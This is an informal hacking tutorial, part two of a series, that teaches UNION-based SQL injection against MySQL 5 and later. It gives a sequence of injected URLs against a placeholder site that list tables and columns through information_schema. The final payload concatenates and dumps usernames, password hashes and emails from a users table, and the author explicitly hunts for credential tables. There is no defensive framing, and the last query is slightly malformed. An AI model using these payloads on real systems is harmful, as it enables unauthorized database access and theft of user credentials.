SQL Injection [Part 2]



Okay, as i promised, i will post the tutorial about SQL injection for MySQL >5.






Finding tables and column for MySQL version > 5

For this version, we need information_schema. It holds all tables and columns in the database.

So, to get tables we will use
table_nameandinformation_schema.tables.

Example:http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

We need to replace the number
2 (the number which is appeared on the screen ealier) with table_name to get the first table from information_schema.tables

We need to add LIMIT to the end of query to list out all tables.

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
* I put
0,1, this is because I want to get ONE result starting from 0

To view the second table, we change limit
0,1to 1,1

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table will be displayed. :)

To get the 3rd table, we must put limit
2,1

Example:
http://www.site.com/index.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

We need to keep changing the limit until we get something useful such as db_admin,poll_user, auth, auth_user and etc...

This method also can be used to find the column name :)

We will use
column_nameand information_schema.columns


The method is same as above , so example would be:
http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column will be displayed.

The second column , change the limit. From
0,1to 1,1


Example:

http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed :D
So keep incrementing until you get something likeusername,user,login, password, pass, passwd etc...



If you wanna display column names for specific table use this query. Using where clause.

For example we have found the table for user:http://www.site.com/index.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we will get column name in table users. Just using the LIMIT, we can list all columns in table users.


For example, if we found column for user, pass and email, to complete the query to make it look nice / to put them all together, we will use the
concat() function again. :)

*Please refer my 1st post about SQLi if you have problem about that function :D


Example:

http://www.site.com/index.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We will get
user:pass:email from table users.

Example:
admin:hash:email@address.com


That's all my tutorial for this time. Hope this might be helpful :)



By Black Eagle